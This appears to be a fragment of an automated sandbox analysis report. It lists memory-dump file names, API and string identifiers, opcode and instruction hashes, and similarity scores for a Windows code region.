                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 3daa09bb9d804bcaa0d00e78eef8534773fad057c9d061f0b899b34650cc3e7e
                                                          • Instruction ID: 53efaf49bf25234e3089ede813a7b06fa20e568a5eaa50747eaafe4e6c56acb3
                                                          • Opcode Fuzzy Hash: 3daa09bb9d804bcaa0d00e78eef8534773fad057c9d061f0b899b34650cc3e7e
                                                          • Instruction Fuzzy Hash: EAF0F072640201BFEA201A45DC06F33BBABEB44771F240318F668561E1EA62FC2096F4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%